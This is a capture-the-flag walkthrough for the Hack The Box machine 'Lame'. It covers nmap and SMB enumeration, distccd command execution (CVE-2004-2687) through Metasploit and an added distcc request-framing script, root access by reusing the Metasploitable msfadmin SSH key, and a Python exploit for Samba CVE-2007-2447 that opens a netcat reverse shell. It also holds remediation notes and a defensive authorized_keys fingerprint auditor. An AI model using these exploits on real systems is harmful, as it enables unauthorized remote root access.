10.10.10.3 - Lame - DistCC, SMB, SSH Reuse

A Metasploitable-like VM - back to old school

Summary:
Vulnerable software: distccd (CVE-2004-2687) on 3632/tcp; Samba 3.0.20 'username map script' (CVE-2007-2447) on netbios-ssn
System vulnerable: 10.10.10.3
Vulnerability explanation: unauthenticated command execution through distccd as user daemon; privilege escalation by reusing the Metasploitable msfadmin SSH key that sits in root's authorized_keys; alternatively the SMB service runs as root, so the Samba username map script injection returns a root shell directly
Severity: critical

Enumeration:

[+] Running only TCP port scan
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-02-02 13:04 GMT
Nmap scan report for 10.10.10.3
Host is up (0.31s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: terminal|WAP|switch|specialized|general purpose|broadband router
Running (JUST GUESSING): Linux 2.4.X|2.6.X (92%), Chip PC embedded (92%), SNR embedded (90%), Crestron 2-Series (90%), Asus embedded (89%)
OS CPE: cpe:/o:linux:linux_kernel cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:snr:snr-s2960 cpe:/o:crestron:2_series cpe:/o:linux:linux_kernel:2.4.18 cpe:/h:asus:rt-ac66u cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Chip PC XtremePC thin client (92%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (90%), OpenWrt White Russian 0.9 (Linux 2.4.30) (90%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (90%), SNR SNR-S2960 switch (90%), Crestron XPanel control system (90%), Linux 2.4.18 (90%), Asus RT-AC66U router (Linux 2.6) (89%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (89%), Asus RT-N16 WAP (Linux 2.6) (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.68 seconds

Nmap ships a script that confirms the distccd vulnerability by executing a command (here `id`) through the daemon and returning its output:

└──╼ $nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687.nse --script-args="distcc-exec.cmd='id'" -Pn
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-02-02 13:23 GMT
Nmap scan report for 10.10.10.3
Host is up (0.19s latency).
PORT STATE SERVICE
3632/tcp open distccd
| distcc-cve2004-2687:
| VULNERABLE:
| distcc Daemon Command Execution
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2004-2687
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Allows executing of arbitrary commands on systems running distccd 3.1 and
| earlier. The vulnerability is the consequence of weak service configuration.
|
| Disclosure date: 2002-02-01
| Extra information:
|
| uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
| http://distcc.googlecode.com/svn/trunk/doc/web/security.html
| http://http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2687
|_ http://http://www.osvdb.org/13378
Nmap done: 1 IP address (1 host up) scanned in 1.14 seconds

Distccd exploitation:

msf5 exploit(unix/misc/distcc_exec) > search distcc
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
msf5 exploit(unix/misc/distcc_exec) > options
Module options (exploit/unix/misc/distcc_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.3 yes The target address range or CIDR identifier
RPORT 3632 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.20 yes The listen address (an interface may be specified)
LPORT 4443 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
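Both the NSE script and the Metasploit module above send the same thing: a distcc protocol-1 "compile job" whose argv[0] is sh. The following is an added example written for this write-up (my own code, not from the original post, the nmap script or the Metasploit module) that frames such a request, reconstructs argv the way distccd does, and decodes the DONE/STAT/SERR/SOUT/DOTO reply. SAMPLE_RESPONSE is constructed, modelled on the `id` output above; run_remote() is the only part that touches the network and is not exercised offline.

```python
"""distcc protocol-1 framing, as used for CVE-2004-2687.

Every message is a sequence of tokens: a 4-byte name plus an 8-digit hex
value. For ARGV, DOTI, SERR, SOUT and DOTO the value is a length and that
many bytes of body follow. A distccd not restricted with --allow execs
argv[0] of any job that looks like a compile; that is the whole bug.
"""
import socket
from typing import Dict, List, Tuple

BODY_TOKENS = {"ARGV", "DOTI", "DOTO", "SERR", "SOUT"}
PROTOCOL_VERSION = 1


def token(name: str, value: int, body: bytes = b"") -> bytes:
    """Encode one token: NAME + 8 hex digits + optional body."""
    return name.encode("ascii") + f"{value:08x}".encode("ascii") + body


def build_request(command: str) -> bytes:
    """Frame a job distccd accepts as a compile but which runs `sh -c command`.
    The trailing '#', '-c', 'main.c', '-o', 'main.o' satisfy the daemon's
    argument scan (it wants -c, a .c input and an -o output); sh receives
    them only as positional parameters $0.. and ignores them."""
    argv = ["sh", "-c", command, "#", "-c", "main.c", "-o", "main.o"]
    msg = token("DIST", PROTOCOL_VERSION) + token("ARGC", len(argv))
    for arg in argv:
        raw = arg.encode()
        msg += token("ARGV", len(raw), raw)
    # DOTI carries the preprocessed source; sh never reads it, so send none.
    return msg + token("DOTI", 0)


def parse_tokens(data: bytes) -> List[Tuple[str, int, bytes]]:
    """Split a request or reply into (name, value, body) triples."""
    out, i = [], 0
    while i < len(data):
        if len(data) - i < 12:
            raise ValueError("truncated token header")
        name = data[i:i + 4].decode("ascii")
        value = int(data[i + 4:i + 12], 16)
        i += 12
        body = b""
        if name in BODY_TOKENS:
            body = data[i:i + value]
            if len(body) != value:
                raise ValueError(f"truncated {name} body")
            i += value
        out.append((name, value, body))
    return out


def server_argv(request: bytes) -> List[str]:
    """Reconstruct argv exactly as distccd will exec it."""
    toks = parse_tokens(request)
    if toks[0] != ("DIST", PROTOCOL_VERSION, b"") or toks[1][0] != "ARGC":
        raise ValueError("not a protocol-1 request")
    argc = toks[1][1]
    argv = [t[2].decode() for t in toks[2:2 + argc] if t[0] == "ARGV"]
    if len(argv) != argc:
        raise ValueError("ARGC does not match ARGV count")
    return argv


def looks_like_compile_job(argv: List[str]) -> bool:
    """Minimal model of the daemon's check: a -c, a .c input and an -o
    output. argv[0] itself is never validated."""
    return "-c" in argv and "-o" in argv and any(a.endswith(".c") for a in argv)


def parse_response(data: bytes) -> Dict[str, object]:
    """Decode DONE/STAT/SERR/SOUT/DOTO into status, stderr, stdout, object."""
    result: Dict[str, object] = {"status": None, "stderr": b"", "stdout": b"", "object": b""}
    for name, value, body in parse_tokens(data):
        if name == "DONE" and value != PROTOCOL_VERSION:
            raise ValueError(f"unexpected DONE version {value}")
        elif name == "STAT":
            result["status"] = value
        elif name == "SERR":
            result["stderr"] = body
        elif name == "SOUT":
            result["stdout"] = body
        elif name == "DOTO":
            result["object"] = body
    return result


# Constructed reply modelled on the nmap output above: the command's stdout
# comes back in SOUT because distccd relays "compiler" output to the client.
SAMPLE_ID_OUTPUT = b"uid=1(daemon) gid=1(daemon) groups=1(daemon)\n"
SAMPLE_RESPONSE = (token("DONE", PROTOCOL_VERSION) + token("STAT", 0)
                   + token("SERR", 0)
                   + token("SOUT", len(SAMPLE_ID_OUTPUT), SAMPLE_ID_OUTPUT)
                   + token("DOTO", 0))


def run_remote(host: str, port: int, command: str, timeout: float = 10.0) -> Dict[str, object]:
    """Send the job to a real daemon and decode the reply (network only)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(command))
        chunks = []
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return parse_response(b"".join(chunks))


if __name__ == "__main__":
    argv = server_argv(build_request("id"))
    print("daemon would exec:", argv, "accepted:", looks_like_compile_job(argv))
    print("sample reply:", parse_response(SAMPLE_RESPONSE))
```

The remediation the CVE text points at is configuration, not patching: start distccd with --allow limited to the build clients' addresses (or bind it to a trusted interface), since the daemon itself never checks who is asking or what argv[0] is.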


While browsing the root folder (/root) from the shell, I found a .ssh directory containing an authorized_keys file with a familiar login name in its comment, msfadmin:

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable

That suggested the box was built on the popular pentesting VM Metasploitable. I booted that VM to compare details and confirmed that the kernel version is the same as well.

All that was left was to take the msfadmin private key from the Metasploitable VM (the id_rsa matching this authorized_keys entry) and log in to Lame as root without a password:

ssh root@10.10.10.3 -i id_rsa

One caveat for anyone repeating this with a current OpenSSH client: 4.7p1 only offers SHA-1 RSA signatures and group1 key exchange, which newer clients disable by default, so you may need to re-enable them for this one connection with -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa -o KexAlgorithms=+diffie-hellman-group1-sha1.
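The check a practitioner would want alongside that step is to identify the key by fingerprint rather than by its comment. Below is an added example (not from the original post) that parses the authorized_keys entry shown above, computes the SHA256 and MD5 fingerprints that `ssh-keygen -lf` prints, and flags the entry against an operator-supplied list of known default or lab keys. LAME_AUTHORIZED_KEYS is the line from the box; the known-bad and suspicious-comment sets are assumptions that you fill from your own reference VM.

```python
"""Spot a reused/default SSH public key in an authorized_keys file.

Parses the OpenSSH authorized_keys line format and the ssh-rsa wire encoding
(RFC 4253: string "ssh-rsa", mpint e, mpint n), computes the fingerprints that
`ssh-keygen -lf` prints, and flags keys whose fingerprint is on a known-bad
list. A comment such as msfadmin@metasploitable is a hint only: comments are
free text, so the fingerprint is what to compare against the reference key.
"""
import base64
import hashlib
import struct
from typing import Dict, List, Set

# The authorized_keys entry found in /root/.ssh on the box (from the write-up).
LAME_AUTHORIZED_KEYS = (
    "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShH"
    "QqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvS"
    "jGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU"
    "3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo"
    "9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable\n"
)

KEY_TYPES = ("ssh-rsa", "ssh-dss", "ssh-ed25519", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")


def _read_string(blob: bytes, off: int):
    """One SSH 'string': 4-byte big-endian length followed by that many bytes."""
    (n,) = struct.unpack(">I", blob[off:off + 4])
    if off + 4 + n > len(blob):
        raise ValueError("truncated key blob")
    return blob[off + 4:off + 4 + n], off + 4 + n


def fingerprint_sha256(blob: bytes) -> str:
    """Same form as ssh-keygen -l: base64 of SHA-256 over the blob, no padding."""
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")


def fingerprint_md5(blob: bytes) -> str:
    """Legacy form (ssh-keygen -l -E md5): colon-separated hex of MD5 over the blob."""
    return "MD5:" + ":".join(f"{b:02x}" for b in hashlib.md5(blob).digest())


def parse_authorized_key(line: str) -> Dict[str, object]:
    """Parse one authorized_keys line. Leading options (command=..., from=...)
    are tolerated as long as they contain no whitespace inside quotes."""
    fields = line.split()
    idx = next((i for i, f in enumerate(fields) if f in KEY_TYPES), None)
    if idx is None or idx + 1 >= len(fields):
        raise ValueError("no recognised key on line")
    blob = base64.b64decode(fields[idx + 1], validate=True)
    ktype, off = _read_string(blob, 0)
    if ktype.decode() != fields[idx]:
        raise ValueError("key type field does not match blob")
    info: Dict[str, object] = {
        "type": fields[idx],
        "options": " ".join(fields[:idx]),
        "comment": " ".join(fields[idx + 2:]),
        "sha256": fingerprint_sha256(blob),
        "md5": fingerprint_md5(blob),
    }
    if info["type"] == "ssh-rsa":
        e, off = _read_string(blob, off)
        n, off = _read_string(blob, off)
        info["e"] = int.from_bytes(e, "big")
        info["bits"] = int.from_bytes(n, "big").bit_length()
    return info


def audit_authorized_keys(text: str, known_bad: Set[str] = frozenset(),
                          suspicious_comments: Set[str] = frozenset()) -> List[Dict[str, object]]:
    """One finding per key matching a known-bad fingerprint (SHA256:/MD5: form
    as ssh-keygen prints it) or a comment naming a default/lab identity."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        key = parse_authorized_key(line)
        reasons = []
        if key["sha256"] in known_bad or key["md5"] in known_bad:
            reasons.append("fingerprint on known-bad list")
        if key["comment"] in suspicious_comments:
            reasons.append(f"comment {key['comment']!r} names a default/lab identity")
        if reasons:
            findings.append({"line": lineno, "key": key, "reasons": reasons})
    return findings


if __name__ == "__main__":
    key = parse_authorized_key(LAME_AUTHORIZED_KEYS)
    print(key["type"], key["bits"], key["sha256"], key["comment"])
    # Assumed lists: populate known_bad with `ssh-keygen -lf` of the reference VM's key.
    for f in audit_authorized_keys(LAME_AUTHORIZED_KEYS, suspicious_comments={"msfadmin@metasploitable"}):
        print("line", f["line"], "->", "; ".join(f["reasons"]))
```

To populate known_bad, run `ssh-keygen -lf id_rsa.pub` against the Metasploitable msfadmin key (or any other default key you track) and paste the fingerprint; the example also reports the RSA exponent and modulus size, which for this key are e=35 and 2048 bits.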

Share discovery on port 139:

└──╼ $smbmap -u "" -p "" -H 10.10.10.3
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.3...
[+] IP: 10.10.10.3:445 Name: 10.10.10.3
Disk Permissions
---- -----------
print$ NO ACCESS
tmp READ, WRITE
opt NO ACCESS
IPC$ NO ACCESS
ADMIN$ NO ACCESS
└──╼ $enum4linux 10.10.10.3
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Feb 2 13:08:53 2019
=======================================
| Share Enumeration on 10.10.10.3 |
=======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
Unable to initialize messaging context
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP LAME

Searchsploit for Samba 3.0.20 turns up "Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)", CVE-2007-2447. The bug is in the `username map script` smb.conf directive: Samba hands the supplied username to a shell unescaped, so a username that starts with `/=` followed by a backtick-quoted command executes that command. Because smbd runs as root on this box, the callback comes back as root and no separate privilege escalation is needed. The fix is Samba 3.0.25 or later, or removing the directive from smb.conf.

A Python version of the exploit:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# From : https://github.com/amriunix/cve-2007-2447
# case study : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/
# Requires pysmb (pip install pysmb).
import sys
from smb.SMBConnection import SMBConnection


def exploit(rhost, rport, lhost, lport):
    # Reverse shell through a named pipe; it runs under the shell that Samba's
    # 'username map script' spawns, which on this target is root.
    payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago'
    # The username reaches /bin/sh unescaped: the backticks run the payload,
    # nohup keeps it alive after the mapping script exits.
    username = "/=`nohup " + payload + "`"
    conn = SMBConnection(username, "", "", "")
    try:
        # The session setup never completes; the timeout only means the
        # username (and with it the payload) has reached smbd.
        conn.connect(rhost, int(rport), timeout=1)
    except Exception:
        print('[+] Payload was sent - check netcat !')


if __name__ == '__main__':
    print('[*] CVE-2007-2447 - Samba usermap script')
    if len(sys.argv) != 5:
        print("[-] usage: python " + sys.argv[0] + " <RHOST> <RPORT> <LHOST> <LPORT>")
    else:
        print("[+] Connecting !")
        rhost = sys.argv[1]
        rport = sys.argv[2]
        lhost = sys.argv[3]
        lport = sys.argv[4]
        exploit(rhost, rport, lhost, lport)
